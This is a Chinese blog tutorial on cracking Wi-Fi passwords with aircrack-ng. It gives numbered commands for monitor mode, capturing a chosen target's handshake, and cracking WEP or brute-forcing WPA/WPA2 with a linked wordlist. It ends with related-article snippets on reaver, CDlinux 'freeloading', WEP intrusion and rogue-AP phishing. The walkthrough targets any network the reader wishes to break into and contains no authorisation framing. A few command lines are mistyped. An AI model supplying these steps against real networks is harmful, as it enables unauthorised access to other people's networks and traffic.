Aircrack-ng无线破解总结

测试环境在linux平台下,我用的是ubuntu环境。ubuntu安装可以直接用sudo apt-get install aircrack-ng

linux应该可以用yum -y install  aircrack-ng 来安装,如果下载它的安装包,没有fangqian的话,非常慢。

------------------------------------------------------------------------------------

方法:

1.确保你的无线是打开的:ifconfig看是否有wlan0或别的无线适配器已经启动,如果没有,后面的步骤都执行不了

  可以先用ifconfig -a看是否有无线适配器,再用ifconfig wlan0 up命令启动无线适配器(wlan0为ifconfig -a中查找到的无线适配器名称)

2.激活网卡为监听模式:

sudo airmon-ng start wlan0

3.查看无线网络,开始抓取无线数据包

sudo airodump-ng mon0 

注意:这里的mon0是你的wlan开始监听之后的别名,一般可能会出现的问题是:

rtl8187 - [phy1]SIOCSIFFLAGS: Name not unique on network

如果出现这个问题,按照这个来解决

sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up

sudo airodump-ng wlan0

或者:

airmon-ng check kill
airmon-ng start <interface>
airodump-ng wlan0mon

不过网络管理给关掉了

sudo servicenetwork-manager stop # 停止 nm服务

udo servicenetwork-manager start # 开启 nm服务

如果一切没有问题====》

这时就会显示你当前可以搜索到的无线信号,PWR是信号值,数值越大表示信号越强,ESSID就是这个信号的名称.ENC为加密方式(WEP最容易破,wpa,wpa2都只能暴力破解)

找到一个你希望破解的essid

4.确定目标后

sudo airodump-ng -c 6 --bssid target‘s MAC -w file mon0

-c 6是指这个信号的频道 ,就是CH那个频道

target‘s MAC 是你想要破解的MAC地址

file 是aircrack-ng 跟目标地址握手后保存的数据

5.收到足够的包之后(即data),开始破解

sudo aircrack-ng file-01.cap

file-01.cap 就是握手后保存的数据

如果是wep类型的密码,在收到足够多的包之后(1w)可以直接破解

如果是wpa/wpa2类型的加密方式,则必须收到握手包之后才能开始暴力破解并且需要使用密码文件(给出一个地址:http://static.hackersgarage.com/darkc0de.lst.gz)如果密码足够复杂的话这样的密码文件也是不够的,需要自己去下更复杂的加密文件

sudo aircrack-ng -w dic file-01.cap

破解成功就能拿到密码了

时间: 2024-10-12 16:32:04

Aircrack-ng无线破解总结的相关文章

利用linux BT5来破解无线 破解无线

以下是自己整理的具体步骤,版权小冯所有. 一.提前准备好bt5的ISO镜像文件.和虚拟机,提前把虚拟机安装好,然后进行安装bt5. 二.进入页面,点击statx,进入可视化界面. 三.进入主界面后,下载reaver-1.3.tar.gz文件.并且把这个文件复制到根目录. 四.打开终端,输入命令 tar –zxvf/reaver-1.3.tar.gz  (实际上是执行文件解压) 五.进入主文件→reaver文件夹→src,然后在上面的菜单栏,点击工具,打开终端. 六.输入命令   ./config

CDlinux无线破解系统

cdlinux是一款功能非常强大的无线密码破解器,cdlinux兼容pin软件,不用抓取握手包.不用跑字典.不用客户端在线就能够破解无线路由器的密码,轻轻松松帮助用户达到蹭网的目的. 基本简介 cdlinux是基于cdlinux 0.9.7.1 iso制作,使用minileaf的spring包无线模块,加入Minidwep-gtk.feedingbottle.inflator和超级权限,启动默认中文,包含无线工具如下: 1.aircrack-ng 2.minidwep-gtk 3.feeding

commview for wifi 破解无线

相信了解无线网络的读者都知道安全性是无线网络的先天不足,正是因为他的传播通过空气,所以信号很容易出现外泄问题,相比有线网络来说信号监听变得非常简单. 部分用户通过WEP加密的方式来保护网络通讯数据包避免被监听者破译,不过WEP加密在现今这个安全技术飞速发展的时代已经不再保险,网上也有很多介绍实 现无线WEP入侵的方法.今天笔者就再介绍一个更为精简的方法,让我们可以在五分钟之内实现无线WEP网络的入侵,将WEP加密密钥轻松还原出明文. 一,五分钟实现无线WEP入侵的特点:   众所周知WEP加密入

完全教程 Aircrack-ng破解WEP、WPA-PSK加密利器

其 实关于无线基础知识的内容还是挺多的,但是由于本书侧重于BT4自身工具使用的讲解,若是再仔细讲述这些外围的知识,这就好比讲述DNS工具时还要把 DNS服务器的类型.工作原理及配置讲述一遍一样,哈哈,估计整本书的厚度就需要再翻一.两倍了.恩,关于无线网络基础知识建议大家可以参考我之前在黑手 这里出版的<无线黑客傻瓜书>一书,会很有帮助. 恩,先说明一下,本章的内容适用于目前市面所有主流品牌无线路由器或AP如Linksys.Dlink.TPLink.BelKin等.涉及内容包括了WEP加密及WP

5分钟破解wpa2密码(转)

首先大家要明白一种数学运算,它叫做哈希算法(hash),这是一种不可逆运算,你不能通过运算结果来求解出原来的未知数是多少,有时我们还需要不同的未知数通过该算法计算后得到的结果不能相同,即你不太可能找到两个不同的值通过哈希得到同一个结果.哈希是一类算法的统称,通常哈希算法都是公开的,比如MD5,SHA-1等等.我们平时说的WPA密码其实叫PSK(pre-shared key),长度一般是8-63字节,它加上ssid通过一定的算法可以得到PMK(pairwise master key).PMK=SH

攻击WEP加密无线网络

1.介绍 针对客户端环境和无客户端环境下破解WEP的几类方法. 有客户端环境: 一般当前无线网络中存在活动的无线客户端环境,即有用户通过无线连接到无线AP上并正在进行上网等操作时. 无客户端环境: 1.当前无线网络中存在已连接的无线客户端,但该无线客户端没有进行上网等操作. 2.当前无线网络中没有任何无线客户端,但当前有用户通过有线方式连接至无线路由器,并通过该无线路由器进行上网等操作. 3.当前无线路由器上没有任何用户连接,无论有线无线.(几乎不可能破解). 2.注入攻击(有客户端) WEP破

CDLinux环境下WiFi密码破解

> 准备好所需软件以及上篇教程中使用Fbinstool制作的可启动U盘 2 > 解压CDLinux-0.9-spring-0412.iso到U盘的根目录  如图 3 > 打开fbinstool编辑menu.lst  如下 timeout 10 default 0 gfxmenu (ud)/message || find --set-root /message && gfxmenu /message configfile (md)4+8 title  启动 CDLinux

Android手机做无线中继路由器

为什么要拿手机做路由器?因为我现在每天要带着一个火柴盒大小的路由器(703n).它提供了一个f了q的无线网络,电脑,手机,平板等设备连接上这个无线网络之后之后就可以自由上twitter,看youtube.但是它还不够理想.,我不希望在拥挤的包里再塞一个设备,我还希望在路上只有3G网络没有USB电源的地方也可以刷刷twitter.最好的设备莫过于手机了. 手机拿来做fq路由器最大的缺陷在于,它不是一个路由器.最开始手机都是处于网络的终端,要么接收3G信号,要么接收wifi信号.后来技术发展之后,手

浅谈无线攻击技术思路

本文只是简单叙述一些无线攻击的思路跟攻击工具,并无原理性的东西,等待下篇会介绍一些工具的原理性的东西跟常见工具的使用.写这篇文章目地只是为了不熟悉无线的童鞋了解. 一.无线钓鱼的几种方式 1:无Portal认证 1.本地建软ap 直接抓包(前提是有无线网卡 台式机不行没无线网卡) 2.利用3g路由器建立ap 连接路由器嗅探 3.刷dd-Wrt OpenWrt 直接抓包 安装tcpdump 2:有Portal认证 1.刷dd-wrt openwrt 利用wifidog做认证 2.本地建ap dns